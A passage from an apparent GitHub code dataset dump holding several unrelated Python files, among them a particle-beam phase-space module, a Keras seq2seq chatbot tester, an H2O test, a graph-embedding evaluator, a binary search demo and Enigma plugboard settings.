平面\n Returns [self.x, self.xp]\n -------\n\n \"\"\"\n return np.array([self.x, self.xp])\n\n def project_to_yyp_plane(self) -> np.ndarray:\n \"\"\"\n 投影到 y-yp 平面\n Returns [self.y, self.yp]\n -------\n\n \"\"\"\n return np.array([self.y, self.yp])\n\n def project_to_plane(self, plane_id: int) -> np.ndarray:\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return self.project_to_xxp_plane()\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return self.project_to_yyp_plane()\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_xxp_plane(\n xMax: float, xpMax: float, delta: float, number: int\n ) 
-> List:\n \"\"\"\n 获取分布于 x xp 平面上 正相椭圆上的 PhaseSpaceParticles\n 注意是 正相椭圆\n Parameters\n ----------\n xMax 相椭圆参数 x 最大值\n xpMax 相椭圆参数 xp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 x xp 平面上 正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n A: float = 1 / (xMax ** 2)\n B: float = 0\n C: float = 1 / (xpMax ** 2)\n D: float = 1\n\n return Stream(Ellipse(A, B, C, D).uniform_distribution_points_along_edge(number).tolist()).map(\n lambda p: PhaseSpaceParticle(p[0], p[1], 0, 0, 0, delta)).to_list()\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_yyp_plane(\n yMax: float, ypMax: float, delta: float, number: int\n ) -> List:\n \"\"\"\n 获取分布于 y yp 平面上 正相椭圆上的 PhaseSpaceParticles\n 注意是 正相椭圆\n Parameters\n ----------\n yMax 相椭圆参数 y 最大值\n ypMax 相椭圆参数 yp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 y yp 平面上 正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n A: float = 1 / (yMax ** 2)\n B: float = 0\n C: float = 1 / (ypMax ** 2)\n D: float = 1\n\n return Stream(Ellipse(A, B, C, D).uniform_distribution_points_along_edge(number).tolist()).map(\n lambda p: PhaseSpaceParticle(0, 0, p[0], p[1], 0, delta)\n ).to_list()\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_plane(\n plane_id: int, xMax: float, xpMax: float, delta: float, number: int\n ) -> List:\n \"\"\"\n 获取分布于 x xp 平面上或 y yp 平面上的,正相椭圆上的 PhaseSpaceParticles\n Parameters\n ----------\n xxPlane x 平面或 y 平面,true:x 平面,false:y 平面\n xMax 相椭圆参数 x/y 最大值\n xpMax 相椭圆参数 xp/yp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 x xp 平面上或 y yp 平面上的,正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_along_positive_ellipse_in_xxp_plane(\n xMax, xpMax, delta, number\n )\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_along_positive_ellipse_in_yyp_plane(\n xMax, xpMax, delta, number\n )\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def phase_space_particles_project_to_xxp_plane(phase_space_particles: List) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 x 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n\n Returns 相空间粒子群投影到 x 平面 [[x1,xp1], [x2,xp2] .. ]\n -------\n\n \"\"\"\n return Stream(phase_space_particles).map(\n lambda p: p.project_to_xxp_plane()\n ).to_vector()\n\n @staticmethod\n def phase_space_particles_project_to_yyp_plane(phase_space_particles: List) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 y 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n\n Returns 相空间粒子群投影到 y 平面 [[y1,yp1], [y2,yp2] .. 
]\n -------\n\n \"\"\"\n return Stream(phase_space_particles).map(\n lambda p: p.project_to_yyp_plane()\n ).to_vector()\n\n @staticmethod\n def phase_space_particles_project_to_plane(phase_space_particles: List, plane_id: int) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 x/y 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n plane_id 投影到 x 或 y 平面\n\n Returns 相空间粒子群投影到 x/y 平面\n -------\n\n \"\"\"\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_project_to_xxp_plane(phase_space_particles)\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_project_to_yyp_plane(phase_space_particles)\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def create_from_running_particle(ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n running_particle: RunningParticle):\n # x y z\n relative_position = running_particle.position - ideal_particle.position\n x = np.inner(coordinate_system.XI, relative_position)\n y = np.inner(coordinate_system.YI, relative_position)\n z = np.inner(coordinate_system.ZI, relative_position)\n\n # xp yp\n relative_velocity = running_particle.velocity - ideal_particle.velocity\n xp = np.inner(coordinate_system.XI, relative_velocity) / ideal_particle.speed\n yp = np.inner(coordinate_system.YI, relative_velocity) / ideal_particle.speed\n\n # delta\n rm = running_particle.compute_scalar_momentum()\n im = ideal_particle.compute_scalar_momentum()\n delta = (rm - im) / im\n\n return PhaseSpaceParticle(x, xp, y, yp, z, delta)\n\n @staticmethod\n def create_from_running_particles(ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n running_particles: List[RunningParticle]) -> List:\n return Stream(running_particles).map(\n lambda rp: PhaseSpaceParticle.create_from_running_particle(\n ideal_particle, coordinate_system, rp)\n ).to_list()\n\n @staticmethod\n def convert_delta_from_momentum_dispersion_to_energy_dispersion(phaseSpaceParticle, centerKineticEnergy_MeV):\n \"\"\"\n 动量分散改动能分散\n Parameters\n ----------\n phaseSpaceParticle 原粒子\n centerKineticEnergy_MeV 中心动能,如 250\n\n Returns 动量分散改动能分散后的粒子\n -------\n\n \"\"\"\n copied: PhaseSpaceParticle = phaseSpaceParticle.copy()\n deltaMomentumDispersion = copied.delta\n deltaEnergyDispersion = Protons.convert_momentum_dispersion_to_energy_dispersion(\n deltaMomentumDispersion, centerKineticEnergy_MeV)\n\n copied.delta = deltaEnergyDispersion\n\n return copied\n\n @staticmethod\n def convert_delta_from_momentum_dispersion_to_energy_dispersion_for_list(phaseSpaceParticles: List,\n centerKineticEnergy_MeV):\n \"\"\"\n 动量分散改动能分散,见上方法 convert_delta_from_momentum_dispersion_to_energy_dispersion\n Parameters\n ----------\n phaseSpaceParticles\n centerKineticEnergy_MeV\n\n Returns\n -------\n\n \"\"\"\n return Stream(phaseSpaceParticles).map(\n lambda pp: PhaseSpaceParticle.convert_delta_from_momentum_dispersion_to_energy_dispersion(\n pp, centerKineticEnergy_MeV)\n ).to_list()\n\n @staticmethod\n def convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion(phaseSpaceParticle,\n centerKineticEnergy_MeV: float):\n copied = phaseSpaceParticle.copy()\n\n EnergyDispersion = copied.getDelta()\n\n MomentumDispersion = Protons.convert_energy_dispersion_to_momentum_dispersion(\n EnergyDispersion, centerKineticEnergy_MeV)\n\n copied.delta = MomentumDispersion\n\n return copied\n\n @staticmethod\n def 
convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion_for_list(\n            phaseSpaceParticles: List, centerKineticEnergy_MeV: float):\n        return Stream(phaseSpaceParticles).map(\n            lambda pp: PhaseSpaceParticle.convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion(\n                pp, centerKineticEnergy_MeV)\n        ).to_list()\n\n    def __str__(self) -> str:\n        return f\"x={self.x},xp={self.xp},y={self.y},yp={self.yp},z={self.z},d={self.delta}\"\n\n    def copy(self):\n        return PhaseSpaceParticle(self.x, self.xp, self.y, self.yp, self.z, self.delta)\n\n    def getDelta(self):\n        return self.delta\n\n\nclass ParticleFactory:\n    \"\"\"\n    Proton factory\n    \"\"\"\n\n    @staticmethod\n    def create_proton(position: np.ndarray, direct: np.ndarray, kinetic_MeV: float = 250) -> RunningParticle:\n        # speed\n        speed = LIGHT_SPEED * np.sqrt(\n            1. - (Protons.STATIC_ENERGY_MeV / (Protons.STATIC_ENERGY_MeV + kinetic_MeV)) ** 2\n        )\n\n        # mass kg\n        relativistic_mass = Protons.STATIC_MASS_KG / np.sqrt(\n            1.0 - (speed ** 2) / (LIGHT_SPEED ** 2)\n        )\n\n        return RunningParticle(position, Vectors.update_length(direct.copy(), speed), relativistic_mass,\n                               Protons.CHARGE_QUANTITY, speed)\n\n    @staticmethod\n    def create_proton_by_position_and_velocity(position: np.ndarray, velocity: np.ndarray) -> RunningParticle:\n        speed = Vectors.length(velocity)\n\n        relativistic_mass = 0.0\n\n        try:\n            relativistic_mass = Protons.STATIC_MASS_KG / np.sqrt(\n                1.0 - (speed ** 2) / (LIGHT_SPEED ** 2)\n            )\n        except RuntimeWarning as e:\n            print(\n                f\"ParticleFactory::create_proton_by_position_and_velocity unexpected exception speed={speed} LIGHT_SPEED={LIGHT_SPEED} e={e}\")\n\n        return RunningParticle(position, velocity, relativistic_mass, Protons.CHARGE_QUANTITY, speed)\n\n    @staticmethod\n    def create_from_phase_space_particle(\n            ideal_particle: RunningParticle,\n            coordinate_system: LocalCoordinateSystem,\n            phase_space_particle: PhaseSpaceParticle) -> RunningParticle:\n        \"\"\"\n        Create a particle from an ideal particle, a phase-space coordinate system and a phase-space particle\n        Parameters\n        ----------\n        ideal_particle the ideal (reference) particle\n        coordinate_system the phase-space coordinate system\n        phase_space_particle the phase-space particle\n\n        Returns the RunningParticle built from the ideal particle, the phase-space coordinate system and the phase-space particle\n        -------\n\n        \"\"\"\n        x = phase_space_particle.x\n        xp = phase_space_particle.xp\n        y = phase_space_particle.y\n        yp = phase_space_particle.yp\n        z = phase_space_particle.z\n        delta = phase_space_particle.delta\n\n        p = ideal_particle.copy()\n        # this is where LocalCoordinateSystem shows its purpose\n        p.position += coordinate_system.XI * x\n        p.position += coordinate_system.YI * y\n        p.position += coordinate_system.ZI * z\n\n        if delta != 0.0:\n            scalar_momentum = p.compute_scalar_momentum() * (1. 
+ delta)\n p.change_scalar_momentum(scalar_momentum) # 这个方法就是为了修改动量而写的\n\n p.velocity += coordinate_system.XI * (xp * p.speed)\n p.velocity += coordinate_system.YI * (yp * p.speed)\n\n return p\n\n @staticmethod\n def create_from_phase_space_particles(\n ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n phase_space_particles: List[PhaseSpaceParticle]) -> List[RunningParticle]:\n return Stream(phase_space_particles).map(\n lambda p: ParticleFactory.create_from_phase_space_particle(ideal_particle, coordinate_system, p)\n ).to_list()\n","repo_name":"madokast/cctpy","sub_path":"codes/cctpy/particle.py","file_name":"particle.py","file_ext":"py","file_size_in_byte":20627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72134831235","text":"# -*- coding: utf-8 -*-\nimport _pickle as pk\nimport tensorflow as tf\nimport nltk\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config)\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense, Embedding, merge\nimport numpy as np\nfrom keras.preprocessing import sequence\n\n\ndef tokenize(sentence): \n sentence_tokens = []\n for word in nltk.word_tokenize(sentence):\n sentence_tokens.append(word)\n return sentence_tokens\n'''====================read train data========================================================================================'''\nlatent_dim = 300 # Latent dimensionality of the encoding space.\nembedding_size = 300\nnum_samples = 10000 # Number of samples to train on.\ndata_path = 'data/train.txt'\n\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nvocab_characters = set()\n\nlines = open(data_path,encoding=\"utf-8\").read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text_str, target_text_str = line.split('\\t')\n input_text_tokens = tokenize(input_text_str)\n target_text_tokens = tokenize(target_text_str)\n input_text = input_text_tokens\n target_text = ['BOS'] + target_text_tokens + ['EOS']\n #print(target_text)\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n if char not in vocab_characters:\n vocab_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n if char not in vocab_characters:\n vocab_characters.add(char)\n\nvocab_characters = sorted(list(vocab_characters), reverse=True)\nvocab_size = len(vocab_characters)\nvocab_size = vocab_size + 1\nnum_encoder_tokens = vocab_size\nnum_decoder_tokens = vocab_size\n\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nmaxlen_input = max(max_encoder_seq_length, max_decoder_seq_length)\nmax_encoder_seq_length, max_decoder_seq_length = maxlen_input, maxlen_input\nmaxlen_output = maxlen_input\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Vocab zise (num of tokens):', vocab_size)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\n'''====================build dictionary========================================================================================'''\n\nvocab_token_index = dict(\n [(char, i+1) 
for i, char in enumerate(vocab_characters)])\nprint(vocab_token_index['BOS'], vocab_token_index['EOS'])\npk.dump(vocab_token_index, open(\"data/vocab_token_index\", 'wb'))\ninput_token_index = vocab_token_index\ntarget_token_index = vocab_token_index\nprint(target_token_index['BOS'], target_token_index['EOS'])\n\n'''====================Creating the training data========================================================================================'''\nunknown_token = 'NONE'\n# Replacing all words not in our vocabulary with the unknown token:\n\nfor i, sent in enumerate(input_texts):\n input_texts[i] = [w if w in vocab_token_index else unknown_token for w in sent]\n \nfor i, sent in enumerate(target_texts):\n target_texts[i] = [w if w in vocab_token_index else unknown_token for w in sent]\n \nX = np.asarray([[vocab_token_index[w] for w in sent] for sent in input_texts])\nY = np.asarray([[vocab_token_index[w] for w in sent] for sent in target_texts])\n\nencoder_input_data = sequence.pad_sequences(X, maxlen=maxlen_input)\ndecoder_input_data = sequence.pad_sequences(Y, maxlen=maxlen_output, padding='post')\n\n'''====================build model=============================================================================================================='''\nembedding_matrix = np.load('data/embedding_matrix.npy')\nprint(\"load embedding_matrix done\")\n\nencoder_inputs = Input(shape=(max_encoder_seq_length,),dtype='int32', name='encoder_input')\nenc_wordembedding = Embedding(input_dim=num_encoder_tokens, output_dim=embedding_size, weights=[embedding_matrix],input_length=max_encoder_seq_length)\nencoder_embedding = enc_wordembedding(encoder_inputs)\nLSTM_encoder = LSTM(latent_dim, init='lecun_uniform')\nencoder_embedding_LSTM = LSTM_encoder(encoder_embedding)\n\ndecoder_inputs = Input(shape=(max_decoder_seq_length,), dtype='int32', name='decorder_input')\ndec_wordembedding = Embedding(input_dim=num_encoder_tokens, output_dim=embedding_size, weights=[embedding_matrix],input_length=max_encoder_seq_length)\ndecoder_embedding = dec_wordembedding(decoder_inputs)\nLSTM_decoder = LSTM(latent_dim, init='lecun_uniform')\ndecoder_embedding_LSTM = LSTM_decoder(decoder_embedding)\n\n'''\nmerge_layer = merge([encoder_embedding_LSTM, decoder_embedding_LSTM], mode='concat', concat_axis=1)\ndense_outputs = Dense(int(num_decoder_tokens/2), activation='relu')(merge_layer)\ndense_layer = Dense(num_decoder_tokens, activation='softmax')\noutputs = dense_layer(dense_outputs)\n'''\nattn = merge([encoder_embedding_LSTM, decoder_embedding_LSTM], mode='dot', dot_axes=[1, 1])\n#attn = Flatten()(attn)\nattn = Dense(latent_dim)(attn)\n\ndense_outputs = Dense(int(num_decoder_tokens/2), activation='relu')(attn)\ndense_layer = Dense(num_decoder_tokens, activation='softmax')\noutputs = dense_layer(dense_outputs)\n\n\nmodel = Model([encoder_inputs, decoder_inputs], outputs=[outputs])\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n\n'''====================decode_sequence=============================================================================================================='''\n\nreverse_vocab_char_index = dict(\n (i, char) for char, i in vocab_token_index.items())\nreverse_input_char_index = reverse_vocab_char_index\nreverse_target_char_index = reverse_vocab_char_index\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n \n model.load_weights('model/model.h5')\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, max_decoder_seq_length))\n # Populate the first 
character of target sequence with the start character.\n target_seq[0, -1] = target_token_index['BOS']\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n prediction = model.predict([input_seq, target_seq])\n\n # Sample a token\n pred_probs = prediction[0,:]\n prob = np.max(pred_probs)\n sampled_token_index = np.argmax(prediction)\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char + ' '\n\n # Exit condition: either hit max length\n # or find stop character.\n if sampled_char == 'EOS' or len(decoded_sentence) > max_decoder_seq_length:\n stop_condition = True\n\n # Update the target sequence (of length 1).\n # target_seq = np.zeros((1, max_decoder_seq_length))\n target_seq[0, 0:-1] = target_seq[0, 1:]\n target_seq[0, -1] = sampled_token_index\n return decoded_sentence\n'''==================testing=============================================================================================================='''\ndef test():\n num_samples = 100 # Number of samples to train on.\n inputList=[]\n input_texts=[]\n target_texts=[]\n data_path = 'data/test.txt'\n vocab_token_index['NONE'] = 0\n lines = open(data_path,encoding=\"utf-8\").read().split('\\n')\n for line in lines[: min(num_samples, len(lines) - 1)]:\n # update for tokenize string to word tokens\n # input_text, target_text = line.split('\\t')\n input_text_str, target_text = line.split('\\t')\n input_text_tokens = tokenize(input_text_str)\n input_texts.append(input_text_tokens)\n inputList.append(input_text_tokens)\n target_texts.append(target_text)\n for i, sent in enumerate(input_texts):\n input_texts[i] = [w if w in vocab_token_index else 'NONE' for w in sent]\n\n X = np.asarray([[vocab_token_index[w] for w in sent] for sent in input_texts])\n encoder_input_data = sequence.pad_sequences(X, maxlen=maxlen_input)\n\n return encoder_input_data, input_texts, target_texts, inputList\n\nwith open(\"result/testResult.txt\",'w', encoding='UTF-8') as f:\n encoder_input_data, input_texts, target_texts, inputList = test()\n for seq_index in range(len(input_texts)):\n # Take one sequence (part of the training test)\n # for trying out decoding.\n print(seq_index)\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n #print('-')\n #print('Input sentence:', inputList[seq_index])\n #print('Answer sentence:', target_texts[seq_index])\n #print('Decoded sentence:', decoded_sentence)\n inputStr = ' '.join(inputList[seq_index])\n decoded_sentence = decoded_sentence.replace('EOS','')\n line = 'post: ' + '\\n' + inputStr + '\\n' + '\\n' +'Answer sentence: ' + '\\n' + target_texts[seq_index] + '\\n' + '\\n' +\"Decoded sentence:\" + '\\n' + decoded_sentence\n f.write(line + '\\n')\n f.writelines(\"=========================================\" + '\\n') \n \nf.close() \nprint('DONE')\n \n \n \n \n \n \n ","repo_name":"kevinhkliu/AI2017FALL","sub_path":"final/training/seq2seqEmbedChabotsTestEngWordLevel.py","file_name":"seq2seqEmbedChabotsTestEngWordLevel.py","file_ext":"py","file_size_in_byte":9551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75687364","text":"import heapq\n\nclass Solution:\n\tdef secondHighest(self, s: str) -> int:\n\n\t\tnumberlist = []\n\n\t\tfor c in s:\n\t\t\tif c.isnumeric() and c not in numberlist:\n\t\t\t\tif len(numberlist) < 
2:\n\t\t\t\t\theapq.heappush(numberlist, c)\n\t\t\t\telif numberlist[0] < c:\n\t\t\t\t\theapq.heapreplace(numberlist, c)\n\n\n\t\tif len(numberlist) > 1:\n\t\t\treturn int(numberlist[0])  # cast needed: the heap holds digit characters, but the signature promises an int\n\n\t\treturn -1","repo_name":"PanJianTing/LeetCode","sub_path":"1796_SecondLargestDigitInAString.py","file_name":"1796_SecondLargestDigitInAString.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"13350194524","text":"import sys, os\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.utils.typechecks import assert_is_type\nfrom h2o.assembly import *\nfrom h2o.transforms.preprocessing import *\nimport os\n\ndef h2oassembly_to_pojo():\n    \"\"\"\n    Python API test: H2OAssembly.to_pojo(pojo_name=u'', path=u'', get_jar=True)\n\n    Copied from pyunit_assembly_demo.py\n    \"\"\"\n\n    fr = h2o.import_file(pyunit_utils.locate(\"smalldata/iris/iris_wheader.csv\"),\n                         col_types=[\"numeric\",\"numeric\",\"numeric\",\"numeric\",\"string\"])\n    assembly = H2OAssembly(steps=[(\"col_select\", H2OColSelect([\"sepal_len\", \"petal_len\", \"class\"])),\n                                  (\"cos_sep_len\", H2OColOp(op=H2OFrame.cos, col=\"sepal_len\", inplace=True)),\n                                  (\"str_cnt_species\",\n                                   H2OColOp(op=H2OFrame.countmatches, col=\"class\", inplace=False, pattern=\"s\"))])\n\n    result = assembly.fit(fr)  # fit the assembly\n    assert_is_type(result, H2OFrame)\n\n    results_dir = os.path.join(os.getcwd(), \"results\")\n    if os.path.isdir(results_dir):\n        assembly.to_pojo(pojo_name=\"iris_munge\", path=results_dir, get_jar=True)\n        assert os.path.isfile(os.path.join(results_dir, \"h2o-genmodel.jar\")), \"H2OAssembly.to_pojo() \" \\\n                                                                              \"command is not working.\"\n    else:\n        assembly.to_pojo(pojo_name=\"iris_munge\", path='', get_jar=False)  # just print pojo to screen\n\nif __name__ == \"__main__\":\n    pyunit_utils.standalone_test(h2oassembly_to_pojo)\nelse:\n    h2oassembly_to_pojo()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_apis/H2OAssembly/pyunit_h2oassembly_to_pojo.py","file_name":"pyunit_h2oassembly_to_pojo.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"}{"seq_id":"4427658134","text":"try: import cPickle as pickle\r\nexcept: import pickle\r\nfrom .metrics import *\r\nfrom . import metrics  # added: the qualified metrics.* calls below need the module object itself\r\nfrom dynamicgem.utils import evaluation_util, graph_util\r\nimport networkx as nx\r\nimport numpy as np\r\n\r\n\r\ndef evaluateStaticGraphReconstruction(digraph, \r\n                                      graph_embedding,\r\n                                      X_stat, \r\n                                      node_l=None, \r\n                                      sample_ratio_e=None, \r\n                                      file_suffix=None,\r\n                                      is_undirected=True,\r\n                                      is_weighted=False):\r\n    node_num = digraph.number_of_nodes()\r\n    # evaluation\r\n    if sample_ratio_e:\r\n        eval_edge_pairs = evaluation_util.getRandomEdgePairs(\r\n            node_num,\r\n            sample_ratio_e,\r\n            is_undirected\r\n        )\r\n    else:\r\n        eval_edge_pairs = None\r\n    if file_suffix is None:\r\n        estimated_adj = graph_embedding.get_reconstructed_adj(X_stat, node_l)\r\n    else:\r\n        estimated_adj = graph_embedding.get_reconstructed_adj(\r\n            X_stat,\r\n            node_l,\r\n            file_suffix\r\n            \r\n        )\r\n    predicted_edge_list = evaluation_util.getEdgeListFromAdjMtx(\r\n        estimated_adj,\r\n        is_undirected=is_undirected,\r\n        edge_pairs=eval_edge_pairs\r\n    )\r\n    MAP = metrics.computeMAP(predicted_edge_list, digraph)\r\n    prec_curv, _ = metrics.computePrecisionCurve(predicted_edge_list, digraph)\r\n    # If weighted, compute the error in reconstructed weights of observed edges\r\n    if is_weighted:\r\n        digraph_adj = 
nx.to_numpy_matrix(digraph)\r\n        estimated_adj[digraph_adj == 0] = 0\r\n        err = np.linalg.norm(digraph_adj - estimated_adj)\r\n        err_baseline = np.linalg.norm(digraph_adj)\r\n    else:\r\n        err = None\r\n        err_baseline = None\r\n    return (MAP, prec_curv, err, err_baseline)\r\n\r\n\r\ndef expGR(digraph, \r\n          graph_embedding,\r\n          X, \r\n          n_sampled_nodes, \r\n          rounds,\r\n          res_pre, \r\n          m_summ,\r\n          file_suffix=None,\r\n          is_undirected=True,\r\n          sampling_scheme=\"rw\"):\r\n    print('\\tGraph Reconstruction')\r\n    n_sampled_nodes = int(n_sampled_nodes)\r\n    summ_file = open('%s_%s.grsumm' % (res_pre, m_summ), 'w')\r\n    summ_file.write('Method\\t%s\\n' % metrics.getMetricsHeader())\r\n    if digraph.number_of_nodes() <= n_sampled_nodes:\r\n        rounds = 1\r\n    MAP = [None] * rounds\r\n    prec_curv = [None] * rounds\r\n    err = [None] * rounds\r\n    err_b = [None] * rounds\r\n    n_nodes = [None] * rounds\r\n    n_edges = [None] * rounds\r\n    for round_id in range(rounds):\r\n        if sampling_scheme == \"u_rand\":\r\n            sampled_digraph, node_l = graph_util.sample_graph(\r\n                digraph,\r\n                n_sampled_nodes=n_sampled_nodes\r\n            )\r\n        else:\r\n            sampled_digraph, node_l = graph_util.sample_graph_rw_int(\r\n                digraph,\r\n                n_sampled_nodes=n_sampled_nodes\r\n            )\r\n        n_nodes[round_id] = sampled_digraph.number_of_nodes()\r\n        n_edges[round_id] = sampled_digraph.number_of_edges()\r\n        print('\\t\\tRound: %d, n_nodes: %d, n_edges:%d\\n' % (round_id,\r\n                                                            n_nodes[round_id],\r\n                                                            n_edges[round_id]))\r\n        sampled_X = X[node_l]\r\n        # sampled_X = np.expand_dims(sampled_X,axis=1)\r\n        MAP[round_id], prec_curv[round_id], err[round_id], err_b[round_id] = \\\r\n            evaluateStaticGraphReconstruction(sampled_digraph, \r\n                                              graph_embedding,\r\n                                              sampled_X, \r\n                                              node_l,\r\n                                              file_suffix= file_suffix,\r\n                                              is_undirected=is_undirected\r\n                                              )\r\n    try:\r\n        summ_file.write('Err: %f/%f\\n' % (np.mean(err), np.std(err)))\r\n        summ_file.write('Err_b: %f/%f\\n' % (np.mean(err_b), np.std(err_b)))\r\n    except TypeError:\r\n        pass\r\n    summ_file.write('%f/%f\\t%s\\n' % (np.mean(MAP), np.std(MAP),\r\n                                     metrics.getPrecisionReport(prec_curv[0],\r\n                                                                n_edges[0])))\r\n    pickle.dump([n_nodes,\r\n                 n_edges,\r\n                 MAP,\r\n                 prec_curv,\r\n                 err,\r\n                 err_b],\r\n                open('%s_%s.gr' % (res_pre, m_summ), 'wb'))\r\n    return np.mean(np.array(MAP))\r\n","repo_name":"palash1992/DynamicGEM","sub_path":"dynamicgem/evaluation/evaluate_graph_reconstruction.py","file_name":"evaluate_graph_reconstruction.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":335,"dataset":"github-code","pt":"61"}{"seq_id":"20214014658","text":"# This function takes a sorted list and an element to search for as input\ndef binary_search(list, element):\n    middle = 0 # Initialize the middle index\n    start = 0 # Initialize the start index\n    end = len(list) - 1 # Initialize the end index to the last valid index (len(list) here let middle run past the end and raise IndexError)\n    steps = 0 # Initialize the step count to 0\n\n    # Continue searching as long as the start index is less than or equal to the end index\n    while (start <= end):\n        # Print the current step number and the current sublist being searched\n        print(f\"Step:{steps},{list[start:end+1]}\")\n\n        steps += 1 # Increment the step count\n        middle = (start + end) // 2 # Calculate the middle index\n\n        # If the middle element is the target, return its index\n        if element == list[middle]:\n            return middle\n        # If the target is less than the middle element, search the left half of the list\n        if element < list[middle]:\n            end = middle - 1\n        # If the target is greater than the middle element, search the right half of the 
list\n        else:\n            start = middle + 1\n\n    # If the target element is not found, return -1\n    return -1\n\n\n# Test the function with a sample list and target element (kept sorted, as binary search requires)\nmy_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\ntarget = 14\n\nbinary_search(my_list, target)","repo_name":"kongo02/binary_search-Python","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"16419242353","text":"\"\"\" Plugboard pairings\n\n\tUp to 10 alphabetic pairings could be made via physical wire connections.\n\tThis was the final component of the encryption before the accompanying lamp\n\twould be lit for a keypress.\n\n\tTaken from the 31st, 30th, and 29th from keylist #649, link below:\n\thttps://en.wikipedia.org/wiki/Enigma_machine#/media/File:Enigma_keylist_3_rotor.jpg\n\"\"\"\n\nplugboard31 = { 'S':'Z',\n\t\t\t\t'G':'T',\n\t\t\t\t'D':'V',\n\t\t\t\t'K':'U',\n\t\t\t\t'F':'O',\n\t\t\t\t'M':'Y',\n\t\t\t\t'E':'W',\n\t\t\t\t'J':'N',\n\t\t\t\t'I':'X',\n\t\t\t\t'L':'Q' }\n\nplugboard30 = { 'I':'S',\n\t\t\t\t'E':'V',\n\t\t\t\t'M':'X',\n\t\t\t\t'R':'W',\n\t\t\t\t'D':'T',\n\t\t\t\t'U':'Z',\n\t\t\t\t'J':'Q',\n\t\t\t\t'A':'O',\n\t\t\t\t'C':'H',\n\t\t\t\t'N':'Y' }\n\nplugboard29 = { 'D':'J',\n\t\t\t\t'A':'T',\n\t\t\t\t'C':'V',\n\t\t\t\t'I':'O',\n\t\t\t\t'E':'R',\n\t\t\t\t'Q':'S',\n\t\t\t\t'L':'W',\n\t\t\t\t'P':'Z',\n\t\t\t\t'F':'N',\n\t\t\t\t'B':'H' }","repo_name":"ethanjpark/enigma_python","sub_path":"src/plugboard.py","file_name":"plugboard.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}{"seq_id":"3604418605","text":"\n\n\nlinha = '~' * 50\ntitulo = '\\33[1:35mCadastro de vendas\\33[m'\nmenu = '\\33[1:33mMenu 